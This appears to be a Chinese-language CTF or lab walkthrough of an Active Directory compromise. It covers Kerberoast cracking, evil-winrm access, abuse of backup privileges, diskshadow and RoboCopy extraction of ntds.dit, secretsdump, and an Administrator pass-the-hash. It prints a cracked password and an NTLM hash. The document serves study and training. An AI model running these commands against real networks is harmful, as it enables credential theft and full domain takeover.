5a17bc5c1930cbbdc218ba250db27c64a2d6ad138f3e58bdd1f4791175150cf53e90eed628ee7a772e87b6bad776914b26f36ade2780d23004f6c4459cea56e65e0a3cbfc2ac8d2df7edb8ef42a87125ac7bcbaeb6373ba30ee22ed5ea9a4abd7a4fc1913c6068b3d02d9337d3534430f54e50ff6fa57fa152b47d4591067c47ad26c6f770d0698fa68f9bc6380614d03bc2beec741fa776f7f6fee89c0c8aee0080b78dc0702a1b44d2e5b88a860eaeca2c73c12a86fa0fd03e78c36d232d972a1919204e26ddb45e4466931396cc8fa1c8b0c9213ca04043f6467874350bccdf2b66ecbdb1735dd14e1624734a2c2029a4b836a11cf51782e77aad2b21918584df76ab082fe94e55a87d01869a283729728e5526bc0ed1c34b875cc79bb4f3cea8a0f05d562ecd271c54291ba5b81ab4e1c9279c24e38b25468a1d66edbe109077f076f5415484e7e8b6a9e340c943ce4ebab500dc310c0d072ac7968b2f8c7d7ce54c603fade0575ed405642a5762781f393f42471857918218bf1058ebb49f252aee60ee93a52e5d978f4d7d88e4f9bd4840e9d8a5a7ec0da7d63b9559ef44db87cec375b07

保存到1.txt，用hashcat爆破

hashcat -m 13100 -a 0 1.txt rockyou.txt --force

tianjing:DPQSXSXgh2

proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 

有 SeBackupPrivilege 和 SeRestorePrivilege 特权

直接导出sam system

reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

然后使用diskshadow来通过卷影副本的方式转储ntds.dit

先在kali的2.txt写入

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "C:\windows\system32\cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\Users\tianjing\ntds.dit
delete shadows volume %someAlias%
reset

然后使用命令unix2dos 2.txt转换一下格式，切换到C目录，然后创一个temp文件夹再传，不然可能无法执行

用diskshadow执行2.txt里的命令

diskshadow /s 2.txt

这里脚本执行copy 的时候会提示拒绝访问

diskshadow.exe : 拒绝访问。
    + CategoryInfo          : NotSpecified: (拒绝访问。:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

可以手动用RoboCopy复制到到当前目录

RoboCopy /b z:\windows\ntds . ntds.dit

下载，之前的system和sam也要

download C:\temp\ntds.dit ntds.dit
download C:\temp\sam.hive sam.hive
download C:\temp\system.hive system.hive

用ntds.dit和system本地进行解密

python secretsdump.py -system system.hive -ntds ntds.dit local

拿到哈希后，pth

proxychains4 evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"

base